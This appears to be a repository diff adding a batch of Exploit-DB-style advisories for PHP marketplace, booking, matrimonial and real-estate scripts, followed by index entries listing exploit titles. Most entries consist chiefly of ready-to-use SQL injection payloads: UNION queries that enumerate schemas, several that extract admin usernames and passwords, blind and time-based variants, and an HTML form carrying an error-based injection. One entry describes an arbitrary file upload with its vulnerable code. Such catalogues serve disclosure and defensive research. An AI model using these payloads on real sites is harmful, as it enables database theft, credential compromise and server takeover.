# Payload: video_id=MTMy&report_videos[]=1' AND SLEEP(5) AND 'MRQT'='MRQT&report_submit=
#
# # # # #

35
exploits/php/webapps/43297.txt Normal file
View file

@ -0,0 +1,35 @@
# # # # #
# Exploit Title: Responsive Realestate Script 3.2 - SQL Injection
# Dork: N/A
# Date: 09.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/responsive-realestate-script/
# Version: 3.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/property-list?tbud=5001-10000[SQL]&quicksrch1=
#
# 34 columns
#
# Parameter: tbud (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: tbud=5001-10000 AND 4719=4719&quicksrch1=
#
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
# Payload: tbud=5001-10000 AND SLEEP(5)&quicksrch1=
#
# # # # #

27
exploits/php/webapps/43299.txt Normal file
View file

@ -0,0 +1,27 @@
# # # # #
# Exploit Title: Multireligion Responsive Matrimonial 4.7.2 - SQL Injection
# Dork: N/A
# Date: 09.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/multireligion-responsive-matrimonial/
# Version: 4.7.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/success-story.php?succid=[SQL]
#
# -16++/*!02222UNION*/(/*!02222SELECT*/+0x283129,0x283229,0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,(/*!02222Select*/+export_set(5,@:=0,(/*!02222select*/+count(*)/*!02222from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!02222table_name*/,0x3c6c693e,2),/*!02222column_name*/,0xa3a,2)),@,2)),0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929)--+-
#
#
# # # # #

36
exploits/php/webapps/43300.txt Normal file
View file

@ -0,0 +1,36 @@
# # # # #
# Exploit Title: Responsive Events & Movie Ticket Booking Script 3.2.1 - SQL Injection
# Dork: N/A
# Date: 09.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/responsive-events-movie-ticket-booking-script/
# Version: 3.2.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/findcity.php?q=[SQL]
#
# s'+/*!02222UNION*/+/*!02222SELECT*/+0x31,0x32,0x33,(/*!02222Select*/+export_set(5,@:=0,(/*!02222select*/+count(*)/*!02222from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!02222table_name*/,0x3c6c693e,2),/*!02222column_name*/,0xa3a,2)),@,2)),0x35,0x36,0x37,0x38,0x39,0x3130,0x3131,0x3132,0x3133,0x3134,0x3135,0x3136,0x3137,0x3138,0x3139,0x3230--+-
#
#
# Parameter: q (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: q=s%' AND 6957=6957 AND '%'='
#
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
# Payload: q=s%' AND SLEEP(5) AND '%'='
#
# # # # #

39
exploits/php/webapps/43301.txt Normal file
View file

@ -0,0 +1,39 @@
# # # # #
# Exploit Title: Multiplex Movie Theater Booking Script 3.1.5 - SQL Injection
# Dork: N/A
# Date: 09.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/multiplex-theater-booking-script/
# Version: 3.1.5
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/trailer-detail.php?moid=[SQL]
#
# -122'++UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%2b1,4,0x30),0x3a20,table_name,0x3c62723e))))x),13,14,15,16,17,18,19,20,21,22,23--+-
#
#
# 2)
# http://localhost/[PATH]/show-time.php?moid=[SQL]
#
# -102'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.COLUMNS)WHERE(TABLE_NAME=0x7469636b65745f61646d696e)AND(0x00)IN(@x:=concat(@x,CONCAT(LPAD(@NR:=@NR+1,2,0x30),0x3a20,column_name,0x3c62723e)))))x),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23))--+-
#
#
# 3)
# http://localhost/[PATH]/event-detail.php?eid=[SQL]
#
# -45'++UNION+SELECT+1,(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(ticket_admin)WHERE(@x)IN(@x:=CONCAT(0x20,@x,admin_user,admin_pass,0x3c62723e))))x),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+-
#
#
# # # # #

27
exploits/php/webapps/43302.txt Normal file
View file

@ -0,0 +1,27 @@
# # # # #
# Exploit Title: Single Theater Booking Script 3.2.1 - SQL Injection
# Dork: N/A
# Date: 09.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/single-theater-booking-script/
# Version: 3.2.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/findcity.php?q=[SQL]
#
# s'++/*!02222UNION*/+/*!02222SELECT*/+1,2,3,(/*!02222Select*/+export_set(5,@:=0,(/*!02222select*/+count(*)/*!02222from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!02222table_name*/,0x3c6c693e,2),/*!02222column_name*/,0xa3a,2)),@,2)),5--+-
#
#
# # # # #

57
exploits/php/webapps/43304.txt Normal file
View file

@ -0,0 +1,57 @@
# # # # #
# Exploit Title: Advanced Real Estate Script 4.0.7 - SQL Injection
# Dork: N/A
# Date: 10.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/advanced-real-estate-script/
# Version: 4.0.7
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/search-results.php?Projectmain=[SQL]&search=
#
# -1'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(/*!02222Select*/+export_set(5,@:=0,(/*!02222select*/+count(*)/*!02222from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!02222table_name*/,0x3c6c693e,2),/*!02222column_name*/,0xa3a,2)),@,2)),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49))--+-
#
#
# 2)
# http://localhost/[PATH]/search-results.php?proj_type=[SQL]&search=
#
# -1'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(/*!05555Select*/+export_set(5,@:=0,(/*!05555select*/+count(*)/*!05555from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!05555table_name*/,0x3c6c693e,2),/*!05555column_name*/,0xa3a,2)),@,2)),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49))--+-
#
#
# 3)
# http://localhost/[PATH]/search-results.php?searchtext=[SQL]&search=
#
# -1'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(/*!09999Select*/+export_set(5,@:=0,(/*!09999select*/+count(*)/*!09999from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!09999table_name*/,0x3c6c693e,2),/*!09999column_name*/,0xa3a,2)),@,2)),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49))--+-
#
#
# 4)
# http://localhost/[PATH]/search-results.php?sell_price=[SQL]&search=
#
# -1'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(/*!09999Select*/+export_set(5,@:=0,(/*!09999select*/+count(*)/*!09999from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!09999table_name*/,0x3c6c693e,2),/*!09999column_name*/,0xa3a,2)),@,2)),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49))--+-
#
#
# 5)
# http://localhost/[PATH]/search-results.php?maxprice=[SQL]&search=
#
# -1022220'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(/*!09999Select*/+export_set(5,@:=0,(/*!09999select*/+count(*)/*!09999from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!09999table_name*/,0x3c6c693e,2),/*!09999column_name*/,0xa3a,2)),@,2)),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49))--+-
#
#
# 6)
# http://localhost/[PATH]/search-results.php?maxprice=[SQL]&search=
#
# -45'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(/*!09999Select*/+export_set(5,@:=0,(/*!09999select*/+count(*)/*!09999from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!09999table_name*/,0x3c6c693e,2),/*!09999column_name*/,0xa3a,2)),@,2)),(18),(19),(20),(21),(22),(23),(24),(25),(26),(27),(28),(29),(30),(31),(32),(33),(34),(35),(36),(37),(38),(39),(40),(41),(42),(43),(44),(45),(46),(47),(48),(49))--+-
#
#
# # # # #

29
exploits/php/webapps/43305.txt Normal file
View file

@ -0,0 +1,29 @@
# # # # #
# Exploit Title: Entrepreneur Bus Booking Script 3.0.4 - SQL Injection
# Dork: N/A
# Date: 10.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/entrepreneur-bus-booking-script/
# Version: 3.0.4
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/booker_details.php?sourcebus=[SQL]
#
# -1++/*!09999UNION*/+/*!09999SELECT*/+(/*!09999Select*/+export_set(5,@:=0,(/*!09999select*/+count(*)/*!09999from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!09999table_name*/,0x3c6c693e,2),/*!09999column_name*/,0xa3a,2)),@,2))--+-
#
# -1++/*!09999UNION*/+/*!09999SELECT*/+(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)/*!50000FROM*/(adminlogin)/*!50000WHERE*/(@x)IN(@x:=/*!50000CONCAT*/(0x20,@x,0x3c62723e555345524e414d453a,admin_username,0x3c62723e504153533a,admin_password,0x3c62723e564552204159415249,0x3c62723e))))x)--+-
#
#
# # # # #

33
exploits/php/webapps/43306.txt Normal file
View file

@ -0,0 +1,33 @@
# # # # #
# Exploit Title: MLM Forex Market Plan Script 2.0.4 - SQL Injection
# Dork: N/A
# Date: 10.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/mlm-forex-market-plan-script/
# Version: 2.0.4
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/news_detail.php?newid=[SQL]
#
# -7'++/*!06666UNION*/(/*!06666SELECT*/+0x283129,0x494853414e2053454e43414e,(/*!06666Select*/+export_set(5,@:=0,(/*!06666select*/+count(*)/*!06666from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!06666table_name*/,0x3c6c693e,2),/*!06666column_name*/,0xa3a,2)),@,2)),0x283429,0x283529,0x283629)--+-
#
#
# 2)
# http://localhost/[PATH]/event_detail.php?eventid=[SQL]
#
# -1'++/*!04444UNION*/(/*!04444SELECT*/+0x283129,0x494853414e2053454e43414e,(/*!04444Select*/+export_set(5,@:=0,(/*!04444select*/+count(*)/*!04444from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!04444table_name*/,0x3c6c693e,2),/*!04444column_name*/,0xa3a,2)),@,2)),0x283429,0x283529,0x283629,0x37)--+-
#
#
# # # # #

26
exploits/php/webapps/43307.txt Normal file
View file

@ -0,0 +1,26 @@
# # # # #
# Exploit Title: MLM Forced Matrix 2.0.9 - SQL Injection
# Dork: N/A
# Date: 10.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/mlm-forced-matrix/
# Version: 2.0.9
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/news-detail.php?newid=[SQL]
#
# -7'++/*!00008UNION*/(/*!00008SELECT*/+0x283129,0x494853414e2053454e43414e,(/*!00008Select*/+export_set(5,@:=0,(/*!00008select*/+count(*)/*!00008from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!00008table_name*/,0x3c6c693e,2),/*!00008column_name*/,0xa3a,2)),@,2)),0x283429,0x283529,0x283629)--+-
#
# # # # #

27
exploits/php/webapps/43308.txt Normal file
View file

@ -0,0 +1,27 @@
# # # # #
# Exploit Title: Car Rental Script 2.0.4 - SQL Injection
# Dork: N/A
# Date: 10.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/car-rental-script/
# Version: 2.0.4
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/countrycode1.php?val=[SQL]
#
# -1'++/*!07777UNION*/+/*!07777SELECT*/+@@version--+-
#
#
# # # # #

30
exploits/php/webapps/43309.txt Normal file
View file

@ -0,0 +1,30 @@
# # # # #
# Exploit Title: Groupon Clone Script 3.01 - 'state_id' 's' SQL Injection
# Dork: N/A
# Date: 10.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/groupon-clone-script/
# Version: 3.01
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/city_ajax.php?state_id=[SQL]
#
# -1'++/*!09999UNION*/+/*!09999SELECT*/+0x31,(/*!09999Select*/+export_set(5,@:=0,(/*!09999select*/+count(*)/*!09999from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!09999table_name*/,0x3c6c693e,2),/*!09999column_name*/,0xa3a,2)),@,2))--+-
#
#
# 2)
# http://localhost/[PATH]/category_list.php?search=[SQL]
#
# # # # #

27
exploits/php/webapps/43310.txt Normal file
View file

@ -0,0 +1,27 @@
# # # # #
# Exploit Title: Muslim Matrimonial Script 3.02 - SQL Injection
# Dork: N/A
# Date: 10.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/matrimonial-script/
# Version: 3.02
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/success-story.php?succid=[SQL]
#
# -12++/*!04444UNION*/+/*!04444SELECT*/+0x31,0x32,0x33,0x34,0x35,0x36,0x37,0x38,0x39,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR+1,4,0x30),0x3a20,table_name,0x3c62723e))))x),0x3131,0x3132,0x3133,0x3134,0x3135,0x3136,0x3137,0x3138,0x3139--+-
#
#
# # # # #

34
exploits/php/webapps/43311.txt Normal file
View file

@ -0,0 +1,34 @@
# # # # #
# Exploit Title: Advanced World Database 2.0.5 - SQL Injection
# Dork: N/A
# Date: 10.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/advanced-world-database/
# Version: 2.0.5
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/city.php?country=[SQL]&state=[SQL]
# http://localhost/[PATH]/state.php?country=[SQL]
#
# Parameter: country (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: country=Russian Federation' AND 6933=6933 AND 'kVcM'='kVcM&state=Moskva
#
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
# Payload: country=Russian Federation' AND SLEEP(5) AND 'ZbHT'='ZbHT&state=Moskva
#
# # # # #

27
exploits/php/webapps/43312.txt Normal file
View file

@ -0,0 +1,27 @@
# # # # #
# Exploit Title: Resume Clone Script 2.0.5 - SQL Injection
# Dork: N/A
# Date: 10.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/resume-builder-script/
# Version: 2.0.5
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/preview.php?id=[SQL]
#
# -2++/*!08888UNION*/(/*!08888SELECT*/+0x283129,0x283229,0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),0x28313129,0x28313229,0x28313329,0x28313429)--+-
#
#
# # # # #

29
exploits/php/webapps/43314.html Normal file
View file

@ -0,0 +1,29 @@
<!--
# # # # #
# Exploit Title: Basic Job Site Script 2.0.5 - SQL Injection
# Dork: N/A
# Date: 10.12.2017
# Vendor Homepage: https://fortunescripts.com/
# Software Link: https://www.phpscriptsmall.com/product/ready-made-job-site-script/
# Version: 2.0.5
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
-->
<html>
<body>
<form id="allJobsearch" action="http://localhost/onlinejobsearch/job" method="post">
<input name="keyword" value="1'and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND ''='" type="hidden">
<button type="submit">Ver Ayari</button>
</form>
</body>
</html>

43
exploits/php/webapps/43315.txt Normal file
View file

@ -0,0 +1,43 @@
# # # # #
# Exploit Title: Vanguard - Marketplace Digital Products PHP 1.4 - Arbitrary File Upload
# Dork: N/A
# Date: 11.12.2017
# Vendor Homepage: https://www.codegrape.com/user/Vanguard/portfolio
# Software Link: https://www.codegrape.com/item/vanguard-marketplace-digital-products-php/15825
# Demo: http://vanguard-demo.esy.es/
# Version: 1.4
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an users upload arbitrary file....
#
# Vulnerable Source:
# .....................
# $row = $row->fetch(PDO::FETCH_ASSOC);
# $folder_name = $row['id'] * 2;
# $folder_name_2 = $folder_name * 5;
# $check_dir1 = 'uploads/'.$folder_name;
# $check_dir2 = $check_dir.'/'.$folder_name_2;
# if (!is_dir($check_dir1)) { mkdir($check_dir1); }
# if (!is_dir($check_dir2)) { mkdir($check_dir2); }
# $thumbnail_path = $check_dir1."/".basename($_FILES['thumbnail_file']['name']);
# $preview_path = $check_dir1."/".basename($_FILES['preview_file']['name']);
# $main_path = $check_dir2."/".basename($_FILES['main_file']['name']);
# $error = 0;
# $upload_path = './';
# .....................
#
# Proof of Concept:
#
# Users Add a new product/Add a product preview...
#
# http://localhost/[PATH]/
# http://localhost/[PATH]/uploads/[FOLDER_NAME]/[FILE].php
#
# # # # #

27
exploits/php/webapps/43316.txt Normal file
View file

@ -0,0 +1,27 @@
# # # # #
# Exploit Title: Vanguard - Marketplace Digital Products PHP 1.4 - SQL Injection
# Dork: N/A
# Date: 11.12.2017
# Vendor Homepage: https://www.codegrape.com/user/Vanguard/portfolio
# Software Link: https://www.codegrape.com/item/vanguard-marketplace-digital-products-php/15825
# Version: 1.4
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/p/[SQL]
#
# '++/*!50000UNION*/+/*!50000SELECT*/+1%2c(/*!08888Select*/+export_set(5%2c@:=0%2c(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5%2cexport_set(5%2c@%2c/*!08888table_name*/%2c0x3c6c693e%2c2)%2c/*!08888column_name*/%2c0xa3a%2c2))%2c@%2c2))%2c3%2c4%2c5%2c6%2c7%2c8%2c9%2c10%2c11%2c12%2c13%2c14%2c15%2c16%2c17%2c18%2c19%2c20%2c21%2c22%2c23%2c24%2c25%2c26%2c27%2c28%2c29%2c30%2c31%2c32%2c33--+-
#
#
# # # # #

35
files_exploits.csv
View file

@ -5763,10 +5763,17 @@ id,file,description,date,author,type,platform,port
43189,exploits/android/dos/43189.py,"Android Gmail < 7.11.5.176568039 - Directory Traversal in Attachment Download",2017-11-28,"Google Security Research",dos,android,
43194,exploits/linux/dos/43194.txt,"QEMU - NBD Server Long Export Name Stack Buffer Overflow",2017-11-29,"Eric Blake",dos,linux,
43199,exploits/linux/dos/43199.c,"Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page",2017-11-30,Bindecy,dos,linux,
43200,exploits/hardware/dos/43200.py,"MikroTik RouterBoard 6.39.2 / 6.40.5 DNS - Denial of Service",2017-11-30,FarazPajohan,dos,hardware,
43207,exploits/windows/dos/43207.txt,"Abyss Web Server < 2.11.6 - Heap Memory Corruption",2017-12-01,hyp3rlinx,dos,windows,
43229,exploits/windows/dos/43229.cs,"Microsoft Windows Defender - Controlled Folder Bypass Through UNC Path",2017-12-07,"Google Security Research",dos,windows,
43233,exploits/multiple/dos/43233.txt,"Wireshark 2.4.0 < 2.4.2 / 2.2.0 < 2.2.10 - CIP Safety Dissector Crash",2017-12-07,Wireshark,dos,multiple,
43234,exploits/linux/dos/43234.c,"Linux Kernel 4.10.5 / < 4.14.3 (Ubuntu) - DCCP Socket Use-After-Free",2017-12-07,"Mohamed Ghannam",dos,linux,
43317,exploits/hardware/dos/43317.c,"MikroTik 6.40.5 ICMP - Denial of Service",2017-12-11,FarazPajohan,dos,hardware,
43320,exploits/multiple/dos/43320.txt,"iOS/macOS - Kernel Double Free due to IOSurfaceRootUserClient not Respecting MIG Ownership Rules",2017-12-11,"Google Security Research",dos,multiple,
43321,exploits/macos/dos/43321.c,"macOS XNU Kernel - Memory Disclosure due to bug in Kernel API for Detecting Kernel Memory Disclosures",2017-12-11,"Google Security Research",dos,macos,
43319,exploits/macos/dos/43319.c,"macOS - 'getrusage' Stack Leak Through struct Padding",2017-12-11,"Google Security Research",dos,macos,
43318,exploits/macos/dos/43318.c,"macOS - 'necp_get_socket_attributes' so_pcb Type Confusion",2017-12-11,"Google Security Research",dos,macos,
43322,exploits/linux/dos/43322.txt,"LibTIFF pal2rgb 4.0.9 - Heap Buffer Overflow",2017-12-11,"Jungun Baek",dos,linux,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -38313,8 +38320,36 @@ id,file,description,date,author,type,platform,port
43281,exploits/php/webapps/43281.txt,"Food Order Script 1.0 - 'list?city' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80
43277,exploits/php/webapps/43277.txt,"E-commerce MLM Software 1.0 - SQL Injection",2017-12-08,"Ihsan Sencan",webapps,php,
43280,exploits/php/webapps/43280.txt,"Facebook Clone Script 1.0 - 'id' / 'send' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80
43278,exploits/php/webapps/43278.txt,"Entrepreneur Dating Script 2.0.1 - 'marital' / 'gender' / 'country' / 'profileid' SQL Injection",2017-12-08,"Ihsan Sencan",webapps,php,
43279,exploits/php/webapps/43279.txt,"Event Calendar Category Script 1.0 - 'city' SQL Injection",2017-12-08,"Ihsan Sencan",webapps,php,
43283,exploits/php/webapps/43283.txt,"Freelance Website Script 2.0.6 - 'pr_id' / 'catid' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80
43284,exploits/php/webapps/43284.txt,"Hot Scripts Clone 3.1 - 'subctid' / 'mctid' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80
43285,exploits/php/webapps/43285.txt,"Foodspotting Clone Script 1.0 - 'quicksearch.php?q' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80
43286,exploits/php/webapps/43286.txt,"Kickstarter Clone Acript 2.0 - 'projid' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80
43287,exploits/php/webapps/43287.txt,"Secure E-commerce Script 2.0.1 - 'searchcat' / 'searchmain' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80
43288,exploits/php/webapps/43288.txt,"Laundry Booking Script 1.0 - 'list?city' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80
43289,exploits/php/webapps/43289.txt,"Lawyer Search Script 1.1 - 'lawyer-list?city' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80
43290,exploits/php/webapps/43290.txt,"Multivendor Penny Auction Clone Script 1.0 - SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80
43291,exploits/php/webapps/43291.txt,"Online Exam Test Application Script 1.6 - 'exams.php?sort' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80
43292,exploits/php/webapps/43292.html,"Opensource Classified Ads Script 3.2 - SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80
